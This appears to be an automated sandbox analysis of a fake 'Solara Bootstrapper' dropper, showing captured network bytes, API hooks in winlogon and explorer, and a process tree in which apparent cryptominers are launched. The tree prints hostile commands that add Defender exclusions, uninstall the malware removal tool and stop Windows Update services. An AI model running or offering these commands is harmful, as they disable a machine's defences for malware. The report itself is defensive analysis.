                                                2025-01-07 15:09:11 UTC1370INData Raw: 66 66 37 31 30 34 35 63 66 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 6f 64 64 62 69 72 64 5f 70 6f 70 6f 76 65 72 2d 70 6f 6c 79 66 69 6c 6c 5f 64 69 73 74 5f 70 6f 70 6f 76 65 72 5f 6a 73 2d 39 64 61 36 35 32 66 35 38 34 37 39 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61
                                                Data Ascii: ff71045cf.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js-9da652f58479.js"></script><script crossorigin="a
                                                2025-01-07 15:09:11 UTC1370INData Raw: 6c 65 73 5f 67 69 74 68 75 62 5f 72 65 6c 61 74 69 76 65 2d 74 69 6d 65 2d 65 6c 65 6d 65 6e 74 5f 64 69 73 74 5f 69 6e 64 65 78 5f 6a 73 2d 66 36 64 61 34 62 33 66 61 33 34 63 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 61 75 74 6f 2d 63 6f 6d 70 6c 65 74 65 2d 65 6c 65 6d 65 6e 74 5f 64 69 73 74 5f 69 6e 64 65 78 5f
                                                Data Ascii: les_github_relative-time-element_dist_index_js-f6da4b3fa34c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_
                                                2025-01-07 15:09:11 UTC1370INData Raw: 65 6c 65 6d 65 6e 74 73 2d 66 39 39 31 63 66 61 62 35 31 30 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 65 6c 65 6d 65 6e 74 2d 72 65 67 69 73 74 72 79 2d 33 62 35 33 36 32 64 33 64 34 30 32 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70
                                                Data Ascii: elements-f991cfab5105.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/element-registry-3b5362d3d402.js"></script><script crossorigin="anonymous" defer="defer" type="app
                                                2025-01-07 15:09:11 UTC1370INData Raw: 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 63 6f 6c 6f 72 2d 63 6f 6e 76 65 72 74 5f 69 6e 64 65 78 5f 6a 73 2d 65 33 31 38 30 66 65 33 62 63 62 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62
                                                Data Ascii: defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-e3180fe3bcb3.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github
                                                2025-01-07 15:09:11 UTC1370INData Raw: 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 63 6f 6d 6d 65 6e 74 69 6e 67 5f 65 64 69 74 5f 74 73 2d 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 62 65 68 61 76 69 6f 72 73 5f 68 74 2d 38 33 63 32 33 35 2d 66 62 34 33 38 31 36 61 62 38 33 63 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22
                                                Data Ascii: script" src="https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-fb43816ab83c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript"
                                                2025-01-07 15:09:11 UTC1370INData Raw: 33 22 20 64 61 74 61 2d 74 75 72 62 6f 2d 74 72 61 6e 73 69 65 6e 74 3d 22 74 72 75 65 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 73 69 74 6f 72 2d 70 61 79 6c 6f 61 64 22 20 63 6f 6e 74 65 6e 74 3d 22 65 79 4a 79 5a 57 5a 6c 63 6e 4a 6c 63 69 49 36 62 6e 56 73 62 43 77 69 63 6d 56 78 64 57 56 7a 64 46 39 70 5a 43 49 36 49 6a 4a 47 4d 6a 59 36 4d 54 4d 34 4e 7a 55 36 4d 30 45 31 4d 7a 4e 45 52 54 6f 7a 51 6b 4a 44 4e 7a 52 45 4f 6a 59 33 4e 30 51 30 4d 7a 6b 30 49 69 77 69 64 6d 6c 7a 61 58 52 76 63 6c 39 70 5a 43 49 36 49 6a 59 34 4d 54 63 77 4d 44 59 35 4f 54 6b 78 4e 44 59 32 4e 7a 63 78 4e 44 45 69 4c 43 4a 79 5a 57 64 70 62 32 35 66 5a 57 52 6e 5a 53 49 36 49 6d 5a 79 59 53 49 73 49 6e 4a 6c 5a 32 6c 76 62 6c 39 79 5a 57 35 6b 5a 58 49 69
                                                Data Ascii: 3" data-turbo-transient="true" /><meta name="visitor-payload" content="eyJyZWZlcnJlciI6bnVsbCwicmVxdWVzdF9pZCI6IjJGMjY6MTM4NzU6M0E1MzNERTozQkJDNzREOjY3N0Q0Mzk0IiwidmlzaXRvcl9pZCI6IjY4MTcwMDY5OTkxNDY2NzcxNDEiLCJyZWdpb25fZWRnZSI6ImZyYSIsInJlZ2lvbl9yZW5kZXIi


                                                Code Manipulations

                                                Function NameHook TypeActive in Processes
                                                ZwEnumerateKeyINLINEwinlogon.exe, explorer.exe
                                                NtQuerySystemInformationINLINEwinlogon.exe, explorer.exe
                                                ZwResumeThreadINLINEwinlogon.exe, explorer.exe
                                                NtDeviceIoControlFileINLINEwinlogon.exe, explorer.exe
                                                ZwDeviceIoControlFileINLINEwinlogon.exe, explorer.exe
                                                NtEnumerateKeyINLINEwinlogon.exe, explorer.exe
                                                NtQueryDirectoryFileINLINEwinlogon.exe, explorer.exe
                                                ZwEnumerateValueKeyINLINEwinlogon.exe, explorer.exe
                                                ZwQuerySystemInformationINLINEwinlogon.exe, explorer.exe
                                                NtResumeThreadINLINEwinlogon.exe, explorer.exe
                                                RtlGetNativeSystemInformationINLINEwinlogon.exe, explorer.exe
                                                NtQueryDirectoryFileExINLINEwinlogon.exe, explorer.exe
                                                NtEnumerateValueKeyINLINEwinlogon.exe, explorer.exe
                                                ZwQueryDirectoryFileExINLINEwinlogon.exe, explorer.exe
                                                ZwQueryDirectoryFileINLINEwinlogon.exe, explorer.exe
                                                Function NameHook TypeNew Data
                                                ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                Function NameHook TypeNew Data
                                                ZwEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                NtQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                ZwResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                NtDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                ZwDeviceIoControlFileINLINE0xE9 0x90 0x03 0x33 0x34 0x4F
                                                NtEnumerateKeyINLINE0xE9 0x9C 0xC3 0x32 0x2C 0xCF
                                                NtQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF
                                                ZwEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                ZwQuerySystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                NtResumeThreadINLINE0xE9 0x9A 0xA3 0x32 0x27 0x7F
                                                RtlGetNativeSystemInformationINLINE0xE9 0x9C 0xC3 0x32 0x2A 0xAF
                                                NtQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                NtEnumerateValueKeyINLINE0xE9 0x90 0x03 0x33 0x31 0x1F
                                                ZwQueryDirectoryFileExINLINE0xE9 0x97 0x73 0x30 0x0A 0xAF
                                                ZwQueryDirectoryFileINLINE0xE9 0x9A 0xA3 0x32 0x2B 0xBF

                                                Click to jump to process

                                                Click to jump to process

                                                Click to dive into process behavior distribution

                                                Click to jump to process

                                                Target ID:0
                                                Start time:10:09:03
                                                Start date:07/01/2025
                                                Path:C:\Users\user\Desktop\Solara Bootstrapper.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\Solara Bootstrapper.exe"
                                                Imagebase:0x400000
                                                File size:10'967'040 bytes
                                                MD5 hash:00A1864355A5EA47902E5757C0D87FD9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                Target ID:1
                                                Start time:10:09:04
                                                Start date:07/01/2025
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAdQBiACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHYAcQB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAbQB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAZgBpACMAPgA="
                                                Imagebase:0x100000
                                                File size:433'152 bytes
                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:2
                                                Start time:10:09:04
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:4
                                                Start time:10:09:04
                                                Start date:07/01/2025
                                                Path:C:\Users\user\AppData\Local\Temp\kx new.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Local\Temp\kx new.exe"
                                                Imagebase:0x400000
                                                File size:10'948'608 bytes
                                                MD5 hash:D9D13FA25E880665FB471A4BE57C494C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Antivirus matches:
                                                • Detection: 100%, Avira
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 71%, ReversingLabs
                                                Reputation:low
                                                Has exited:true

                                                Target ID:5
                                                Start time:10:09:04
                                                Start date:07/01/2025
                                                Path:C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe"
                                                Imagebase:0x890000
                                                File size:13'312 bytes
                                                MD5 hash:6557BD5240397F026E675AFB78544A26
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Antivirus matches:
                                                • Detection: 33%, ReversingLabs
                                                Reputation:low
                                                Has exited:true

                                                Target ID:6
                                                Start time:10:09:04
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:7
                                                Start time:10:09:05
                                                Start date:07/01/2025
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcAB0ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAcAB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG4AagBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAbgBxACMAPgA="
                                                Imagebase:0x100000
                                                File size:433'152 bytes
                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:8
                                                Start time:10:09:05
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:9
                                                Start time:10:09:06
                                                Start date:07/01/2025
                                                Path:C:\Users\user\AppData\Local\Temp\Kawpow new.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Users\user\AppData\Local\Temp\Kawpow new.exe"
                                                Imagebase:0x7ff6cdc40000
                                                File size:5'471'744 bytes
                                                MD5 hash:FB6A3B436E9F9402937D95F755B62F91
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Antivirus matches:
                                                • Detection: 74%, ReversingLabs
                                                Reputation:low
                                                Has exited:true

                                                Target ID:10
                                                Start time:10:09:07
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                Imagebase:0x7ff7be880000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:11
                                                Start time:10:09:07
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:12
                                                Start time:10:09:07
                                                Start date:07/01/2025
                                                Path:C:\Users\user\AppData\Local\Temp\xmr new.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Users\user\AppData\Local\Temp\xmr new.exe"
                                                Imagebase:0x7ff7b6150000
                                                File size:5'471'744 bytes
                                                MD5 hash:7D6398EBFB82A24748617189BF4AD691
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Antivirus matches:
                                                • Detection: 74%, ReversingLabs
                                                Has exited:true

                                                Target ID:13
                                                Start time:10:09:08
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                Imagebase:0x7ff7be880000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:14
                                                Start time:10:09:08
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:15
                                                Start time:10:09:08
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                Imagebase:0x7ff6ef0c0000
                                                File size:496'640 bytes
                                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                Has elevated privileges:true
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:16
                                                Start time:10:09:16
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                Imagebase:0x7ff7ccdf0000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:17
                                                Start time:10:09:16
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\sc.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                Imagebase:0x7ff67c8f0000
                                                File size:72'192 bytes
                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:18
                                                Start time:10:09:16
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:19
                                                Start time:10:09:16
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:20
                                                Start time:10:09:16
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\wusa.exe
                                                Wow64 process (32bit):false
                                                Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                Imagebase:0x7ff704ea0000
                                                File size:345'088 bytes
                                                MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:21
                                                Start time:10:09:16
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\sc.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                                Imagebase:0x7ff67c8f0000
                                                File size:72'192 bytes
                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:22
                                                Start time:10:09:16
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:23
                                                Start time:10:09:16
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\sc.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                                Imagebase:0x7ff67c8f0000
                                                File size:72'192 bytes
                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:24
                                                Start time:10:09:16
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:25
                                                Start time:10:09:16
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\sc.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\sc.exe stop bits
                                                Imagebase:0x7ff67c8f0000
                                                File size:72'192 bytes
                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:26
                                                Start time:10:09:16
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                Imagebase:0x7ff7ccdf0000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:27
                                                Start time:10:09:16
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:28
                                                Start time:10:09:16
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\sc.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                                Imagebase:0x7ff67c8f0000
                                                File size:72'192 bytes
                                                MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:29
                                                Start time:10:09:16
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:30
                                                Start time:10:09:16
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff6d64d0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:31
                                                Start time:10:09:16
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\wusa.exe
                                                Wow64 process (32bit):false
                                                Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                Imagebase:0x7ff704ea0000
                                                File size:345'088 bytes
                                                MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:32
                                                Start time:10:09:16
                                                Start date:07/01/2025
                                                Path:C:\Windows\System32\sc.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
